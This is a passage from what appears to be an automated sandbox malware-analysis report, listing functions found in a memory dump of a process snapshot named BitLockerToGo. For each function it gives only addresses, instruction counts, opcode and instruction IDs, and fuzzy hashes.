Instruction Fuzzy Hash: 8521FF73B64A240BA308DD7D8C5126ABAD26BC9634B1DCB7C7AB9C73D4E538CC054682

Function 0042DC90 Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b37aae2f6930e42b1a61347e3e9dbd92fef8b9273bd10140cc22e49d03226d9
Instruction ID: 5090ff39969340d82e65e03bc77ec75b7b8b3ebe754ce321d886b12dafb899e6
Opcode Fuzzy Hash: 8b37aae2f6930e42b1a61347e3e9dbd92fef8b9273bd10140cc22e49d03226d9
Instruction Fuzzy Hash: E5210B73E65D210B875CCD3D8C1626A7D938BD6730B2DC73D7EB6DB2E4DA2889114288

Function 00424190 Relevance: .1, Instructions: 80COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 554fd61896d79f32e223b5351be376a6db269b08eafdf3d462922c41ffb224cb
Instruction ID: c8c58b3da15a5a31bb1e7fa565c417ac82b10a20e9a4d18e989268fbcd7cd162
Opcode Fuzzy Hash: 554fd61896d79f32e223b5351be376a6db269b08eafdf3d462922c41ffb224cb
Instruction Fuzzy Hash: FB214D33A26D610B5758CD7D8C1112BBED3ABC6330B3AC73D79B6D72E4D67889114244

Function 0043E560 Relevance: .1, Instructions: 80COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4acb48474ea04f77fac0b6e0ee02ee4d559c8bfd7a6fb8b2e6ba1471f8137d4d
Instruction ID: f09afa059d1c086a90589b93580c4e3b7ad61998a5a902dd179604ea730da2f1
Opcode Fuzzy Hash: 4acb48474ea04f77fac0b6e0ee02ee4d559c8bfd7a6fb8b2e6ba1471f8137d4d
Instruction Fuzzy Hash: CD210B73A26D600B835CC97D8C5126779935BC6730B29CB3D7AB5DB2E0CB78C9114289

Function 0041B860 Relevance: .1, Instructions: 80COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29a648a717b2abee13e18710f4ac6a9619b6b217352eac9aad564caeba279e39
Instruction ID: 5f16d8ceef2fe98625dd9496df53a6ca5411c4e810362a21bc29676cf413f99c
Opcode Fuzzy Hash: 29a648a717b2abee13e18710f4ac6a9619b6b217352eac9aad564caeba279e39
Instruction Fuzzy Hash: C5216D73E55D20079308C93ECC1126669935BD1730F2EC36DB9B6CB2E8EA7888124285

Function 0041DB20 Relevance: .1, Instructions: 80COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c96c0ee255f5c6496ea7d48e80ac86dfb1873c0637a08a50578d8077486fc329
Instruction ID: 42dbf12d43c4fcc112d61da79352e0b4f02afac971ce0699a3d9bb2e20f9c4c6
Opcode Fuzzy Hash: c96c0ee255f5c6496ea7d48e80ac86dfb1873c0637a08a50578d8077486fc329
Instruction Fuzzy Hash: 51213673E26D600BE344DD3E8C1126B7A935BC2730F3EC32979B5DB2E8DA3489124285

Function 0041E3D0 Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cda63ffdf19e5cb94e2ceb708019861b89710cc1b766e0424674a0a9605647e2
Instruction ID: 7c85a2ae652a3b1de653abc185e24e8e3c021c29ad02261c3961f98bcf3c748a
Opcode Fuzzy Hash: cda63ffdf19e5cb94e2ceb708019861b89710cc1b766e0424674a0a9605647e2
Instruction Fuzzy Hash: 17218E73E259600B9328DD7D8C51257B9935BC2730B2EC72978B8DB3E4D638C9024695

Function 00411E80 Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff375446aff656297820ab8840d487d68695b42133da982623f732e2864ff52b
Instruction ID: 89a0279b566edc550ea44b04d59baf753e644718d8cf298963b49d36f1e56689
Opcode Fuzzy Hash: ff375446aff656297820ab8840d487d68695b42133da982623f732e2864ff52b
Instruction Fuzzy Hash: B7212173D659210BD3588D7C8D16367BD929B82730F2A873E7DBAD72E0DA68C9114280

Function 00446F00 Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0e68898c104cfb5b0faadddc4bbf0befafee4948cb1328812326ad42aab9000
Instruction ID: 743eed6337fe634663bfe86d2b11e7014c1361f82d6802cd09b55e4331fc8631
Opcode Fuzzy Hash: e0e68898c104cfb5b0faadddc4bbf0befafee4948cb1328812326ad42aab9000
Instruction Fuzzy Hash: 672171B3D259210BC358C97DCC113677ED25BD2330F2AC72D79B5D72E8DA64C9110289

Function 0044F0C0 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52790c40c2d64ca2e59ed9e0a88cb254b4675b6c125c2c1029b2a9f33e710692
Instruction ID: d68ecb3375f05831fbedb328c541c91d9b4dcae9171b523313a6ed677a3fa4c9
Opcode Fuzzy Hash: 52790c40c2d64ca2e59ed9e0a88cb254b4675b6c125c2c1029b2a9f33e710692
Instruction Fuzzy Hash: 74216A73E26D210B9358C87D8C05257AAD35BC6730B2EC77ABDB4D72E8DA788C524284

Function 0043F2C0 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91e82f15e612b0c6a0b027ea486948d1f086a6d0b85b473cf45100f6ff4eafdf
Instruction ID: 75dbae5f8e8f5d5fab78947556932b032c8560b2977ede90d2ab7a38145b359b
Opcode Fuzzy Hash: 91e82f15e612b0c6a0b027ea486948d1f086a6d0b85b473cf45100f6ff4eafdf
Instruction Fuzzy Hash: D121F2B3F559200B9708C97C8C5622BAAD217D5670B2AC73E6DF9EB3D4E978CC4182C1

Function 004348E0 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 701638e47f816d1f5b3378efcb7eb2fe23db668b9fb577c79fc6119f4a0a2108
Instruction ID: 25cc62a53fa2852915adfef5dd410484d03fcc4c8152e8d9126d299a45f20d18
Opcode Fuzzy Hash: 701638e47f816d1f5b3378efcb7eb2fe23db668b9fb577c79fc6119f4a0a2108
Instruction Fuzzy Hash: 3A21F273E26D300B4358CD7D8C0006AAE929BC7730B2B8779ADF8EB2E4D3608D1146C8

Function 00434E20 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96307cbcc20a5a7fdcf238700bc7c7328e1dc5f5f594aa9baa8e9fea6f2b114b
Instruction ID: 4250e3aa0058a82fec43d2d831b469f7b9d70315778136d6bf73202cdfddd5af
Opcode Fuzzy Hash: 96307cbcc20a5a7fdcf238700bc7c7328e1dc5f5f594aa9baa8e9fea6f2b114b
Instruction Fuzzy Hash: A4215EB3B25D2107874CC93CCC2226B79929BD5630B2E832D79B7D73E8E63888014295

Function 00412900 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03f86eeb3e2feaea7d5987835d8ac0fa1d09d8a3e57f660846389c0475cc2aa0
Instruction ID: 7df2e57888ddcf1d55aa8392f5c185a5f88a2efdaabf05495c4cd13f50e625fa
Opcode Fuzzy Hash: 03f86eeb3e2feaea7d5987835d8ac0fa1d09d8a3e57f660846389c0475cc2aa0
Instruction Fuzzy Hash: 2B219673E269210B9748DD7EAC11227AAD39BC5730F1BC72E7DB6C72D8DE7488124641

Function 0043ECA0 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3897fd8f0df3147e7475c68f6910ec674ef50d140c44dae9c16cd01bdf339ef9
Instruction ID: d3bd94207ce839224d176a6cff3ca3fbebb66a871bb2efb4829d21540bd3c329
Opcode Fuzzy Hash: 3897fd8f0df3147e7475c68f6910ec674ef50d140c44dae9c16cd01bdf339ef9
Instruction Fuzzy Hash: B1212C33F25D200B934CC83D8C512776E838BC6330B2A873D79BAD32E4CA68C9168258

Function 0041CB20 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb1f0664ea7b82032cc53c9bf5168ff28a7fa528d0dc3c911a4cc0bfa98fbcab
Instruction ID: 781b04670620d304091b5865cc4b4e8eae59094650921ce81d3ac43f3f369297
Opcode Fuzzy Hash: fb1f0664ea7b82032cc53c9bf5168ff28a7fa528d0dc3c911a4cc0bfa98fbcab
Instruction Fuzzy Hash: BF217233F249210BD708DD3D8D1566AAAD35BC5230F1ACB3DA8B9D73E8D97CC8024280

Function 0042AD40 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 247c01aff1bc268e7d88736116698355c396776afc3c942da8396b3ecefd55c3
Instruction ID: 6de0abfd700c549611b94f5df6fb56bc71055284c3f148428bc596de9801f318
Opcode Fuzzy Hash: 247c01aff1bc268e7d88736116698355c396776afc3c942da8396b3ecefd55c3
Instruction Fuzzy Hash: 6E216A73A26E200B9348CC3D8D65167BAD29BC6330B2E873DBEB6C72E4D634C9014645

Function 004467F0 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6e4de2e97903501ad8f2401c7aa96bf6e2b9f039bdb356924bd059b2cd1fdd9
Instruction ID: 2b7f212a3a4486e9fa0dd2aa4f1caa4541781f626d0872070eaed3d17d10e17c
Opcode Fuzzy Hash: e6e4de2e97903501ad8f2401c7aa96bf6e2b9f039bdb356924bd059b2cd1fdd9
Instruction Fuzzy Hash: F1213773E26D7006D358C97D8C01357BA925BD2B30F2AC7397EB8DB2E4D63889114299

Function 0041C8A0 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c103318e4816b43c4b07367a5cce267817f5bbd48edbdb8a04d96b21b1219cc
Instruction ID: 9150d0eaaf58adc065849c79513bd21c1806dbd7f686c7d31d490f47a8f80e38
Opcode Fuzzy Hash: 8c103318e4816b43c4b07367a5cce267817f5bbd48edbdb8a04d96b21b1219cc
Instruction Fuzzy Hash: B0217F73F169614B8318CD3D8D06547AAD39BD5630B2EC739A8B8DB3ECDA74CC064681

Function 0042DD70 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1fa570b20aa93d1fb1f38bfcdcbc88463993017483abee1b0040fd296d30e45
Instruction ID: afcf4c4b18743187e88c9cf6d7d31a708fa0c01a6c0a1a0cf27e50a01925a3b0
Opcode Fuzzy Hash: f1fa570b20aa93d1fb1f38bfcdcbc88463993017483abee1b0040fd296d30e45
Instruction Fuzzy Hash: C5216D73E6692107D348C97C8C1225AAAD257D2770F2AC33DACF9E73E4DA788C0242C5

Function 004160FD Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e6f6948bda800252cf28d1688fdf8ad2ab9a72f308f5bf97d64e8462bb45838
Instruction ID: e6ceb9862e25ece53429448402bf1b1d1bb00f410df9eaa3d25f37fe54ca7b54
Opcode Fuzzy Hash: 4e6f6948bda800252cf28d1688fdf8ad2ab9a72f308f5bf97d64e8462bb45838
Instruction Fuzzy Hash: 902138B68083909FC7009F54C84056BF7F5BF85319F190D2EF895A7292E7B8E884CB5A

Function 00446700 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a2d4a9d1f5a68150bb7403281ef75d9906ba591e5cf8b9ffd692bba8024b83b
Instruction ID: 4d72fa7c8e8535956c6a7d0133f97e64e2cb3983f49b21b80dea225a67c4466f
Opcode Fuzzy Hash: 2a2d4a9d1f5a68150bb7403281ef75d9906ba591e5cf8b9ffd692bba8024b83b
Instruction Fuzzy Hash: 3821A473E6AA101FA344D93E8D41127BED38FC5334F2AC76DBAB5C72E4C67486114649

Function 00446A90 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b35f4bb34c2ae0f72a4c04390e2e4c16037ac094b1385ee0dcb6886abc282f4d
Instruction ID: ccc22596c1a219afecc53841d2345c16aa1eb2a54c1e8bf6f63b45e67d960b58
Opcode Fuzzy Hash: b35f4bb34c2ae0f72a4c04390e2e4c16037ac094b1385ee0dcb6886abc282f4d
Instruction Fuzzy Hash: 61218473E15921478328DD3E8D06147BAD35BD5630B2AC779ADF8DB3E8D978CC024281

Function 00411B40 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc78b6cac1dcf209c55548615220b5fa1d0e6db84dec57f720b538f410374ea6
Instruction ID: 15d2ca95e9d566c23b09f449d707387ea210f5e00d08259a38d647c1efdc80f5
Opcode Fuzzy Hash: fc78b6cac1dcf209c55548615220b5fa1d0e6db84dec57f720b538f410374ea6
Instruction Fuzzy Hash: 982100B3E25D2107475CDD3D8C2116779D29B96730B2E872E7FB7DB2E4D72089114289

Function 00449E10 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cbd524897fe1e836f66e40705b3f21480e700e478f9a85b857c98daf1537d51f
Instruction ID: d99c9a3e90bf9f4a6f46e084ce6ca97eccd0a13e534369e2d732a39b543b9c0a
Opcode Fuzzy Hash: cbd524897fe1e836f66e40705b3f21480e700e478f9a85b857c98daf1537d51f
Instruction Fuzzy Hash: 84217F73A25D110B834CCC3D8D2626ABAD39BC6330B298B3DB9B6C73E4DA78C9014245

Function 004212DB Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84e7ef4095f2df83c046acf43e9a823c1b443128cbae0163fb1feb3531dbddb0
Instruction ID: b588d08f5b553af008c7774710b5835c4c5d2c14e46b1de5ba8c43b96e12e24a
Opcode Fuzzy Hash: 84e7ef4095f2df83c046acf43e9a823c1b443128cbae0163fb1feb3531dbddb0
Instruction Fuzzy Hash: FC219E31618380CBD334CF24E851AAFB3E2FB99385F54592DD589D7291D735E912CB0A

Function 004252B0 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58bbf29794a46e47d81eb6f980b6a7c70b092eb459c284592adf1e6efcc1f768
Instruction ID: 50d7450ff27c168baf4902a24918c3107476d14ace569728335d2af5db4dcdf1
Opcode Fuzzy Hash: 58bbf29794a46e47d81eb6f980b6a7c70b092eb459c284592adf1e6efcc1f768
Instruction Fuzzy Hash: C7216DB3D169714B9324CC7D8D05147AAD356D6730B2FC36AACF8EB2E8DA748C0246C1

Function 0043E3D0 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c2f92988a20e607f46cb846bdd259dc199d439b2e92e49df82e3e6267591511
Instruction ID: 2ebc63d9cb0246efc2205e454b5743d59052f073306e4e3dddd1d0b37eba8444
Opcode Fuzzy Hash: 0c2f92988a20e607f46cb846bdd259dc199d439b2e92e49df82e3e6267591511
Instruction Fuzzy Hash: F411BEB3E146200BC74CCD7D8C6226BAAD25BC5234F1BCB3EACB5E73C0D928C9115280

Function 004246F0 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1330573f523967bb46503403b32a651e1c1aaec78533a444a0efe9c282c4aeb6
Instruction ID: 8b618c1323d34b583c685dc63e54f27753819b78ee44df5d97d741f157e1b1d6
Opcode Fuzzy Hash: 1330573f523967bb46503403b32a651e1c1aaec78533a444a0efe9c282c4aeb6
Instruction Fuzzy Hash: AE218473D65A310BC3448D7D8C0661BBED25BD6330F2A876D6CF8D32E4DA64CE114284

Function 00427970 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62b56abd70364febe023f077903b430aedb8cb48d2a4c50de71dcef036edc1d7
Instruction ID: e8a87298c814b0a5f5ac7c475ff782ba02a38d83cc2b9cf4ed2910bf47685364
Opcode Fuzzy Hash: 62b56abd70364febe023f077903b430aedb8cb48d2a4c50de71dcef036edc1d7
Instruction Fuzzy Hash: 59117F77E59D200B870CC93D8C22267BAD29BC5730F29873DB9B6C72E4DA3888114644

Function 0043EBC0 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6f1f641bb4518965373a7755b01987d039c6331d3889674528a50c7ecedb875
Instruction ID: c56ec420149c1a1b36a21f8462e832e7dc3be3172dedf120a64f2aa172c09645
Opcode Fuzzy Hash: b6f1f641bb4518965373a7755b01987d039c6331d3889674528a50c7ecedb875
Instruction Fuzzy Hash: EB119DB3E249611BC34CCD3C8C2136A7AD28BD6330F19CB2E7AB6C72D5D968C8544291

Function 0044F340 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 421b434c9ffff72779582613610c59ab8a84bc3081eef97f62d39de4411f5b49
Instruction ID: fc3fbf9661ffe7741f1e1022e13c2d96e7a2fee6778491f2096de0adee0412cb
Opcode Fuzzy Hash: 421b434c9ffff72779582613610c59ab8a84bc3081eef97f62d39de4411f5b49
Instruction Fuzzy Hash: 82113073E26D710B8358CD3C8C11227BDD25B96730B2A872DBDF5E72E4D668CD004685

Function 0042D590 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f91906764cb265ca2756af2c1f40ad09e6bf7d92fffa6a70ef54dc03b55ae2b
Instruction ID: a577df20f2a3281fbf1d051dfee0989fe88d6b7b94e1905400675c99fd3272e7
Opcode Fuzzy Hash: 1f91906764cb265ca2756af2c1f40ad09e6bf7d92fffa6a70ef54dc03b55ae2b
Instruction Fuzzy Hash: A0119373E15A610B83188D7C8C52166BAD2ABC5730B2AC73EBDF6D72D4D6688D104684

Function 0043F5A0 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d12a92c79596acedc9eaafbf5de8f36b1a56be4da342baeb5dea1840b6dcc2b6
Instruction ID: a78ba21debd04cbc44238d198f9533ec0e2785fe1ee8dd126b8e3c18a9039eae
Opcode Fuzzy Hash: d12a92c79596acedc9eaafbf5de8f36b1a56be4da342baeb5dea1840b6dcc2b6
Instruction Fuzzy Hash: 97114CB3E159110BD308C93ECC51766BAD39BC2331F2AC739B9B4C72E8D67889124241

Function 0040E950 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a20812626cd72cf1b1d283b2091db9103c83cf941fa7c415af590223c64d8227
Instruction ID: 9c3c2ef8884c83e6b25920791abeb6f200a44fdedbfee5fa598b2efce8160075
Opcode Fuzzy Hash: a20812626cd72cf1b1d283b2091db9103c83cf941fa7c415af590223c64d8227
Instruction Fuzzy Hash: 73115B73E64D610B8348C93D8C1566ABED24BC6330B298B3DB9B4D33E4D678C8418295

Function 0041BE70 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3007cd792701c86b5be7cb43a732bb4d8bc768665a33e30d66d8d3c77d7f820b
Instruction ID: b120a048addbbba21f612fe26da2b0d3dc9b089acb43178d3bb623f4aae4a8b1
Opcode Fuzzy Hash: 3007cd792701c86b5be7cb43a732bb4d8bc768665a33e30d66d8d3c77d7f820b
Instruction Fuzzy Hash: 042181B3D26EA00BA244DD3D9C05117BED36FD6730B2EC72979B4D72E8D670C9054245

Function 00433000 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40fe325963bd8623649cf024c0be0c66b0153ce16cad23814abc74b79bc01db3
Instruction ID: f74f281fddd3712e6953a2d15c42d5a7fe8ba3afb417349b6d458cd93e0c9bfe
Opcode Fuzzy Hash: 40fe325963bd8623649cf024c0be0c66b0153ce16cad23814abc74b79bc01db3
Instruction Fuzzy Hash: 4E11AF73B25921078718CC7CDC6622A7AD29B81374F29873D79B7C73E4E938C9014295

Function 0041E310 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03d9a1f4101e3882b7a2beb266fc57477ba266ef0af4706c5a99ed51dddb2a92
Instruction ID: 181c52e7c00d9356305910dcbe4ccbf83bdf58a069f395907ddf93df48078a73
Opcode Fuzzy Hash: 03d9a1f4101e3882b7a2beb266fc57477ba266ef0af4706c5a99ed51dddb2a92
Instruction Fuzzy Hash: 62114273E159314B9318DD3D8D02157BED35AD5730B2AC739ACB8D72E8DA388C0546C5

Function 00424CC0 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

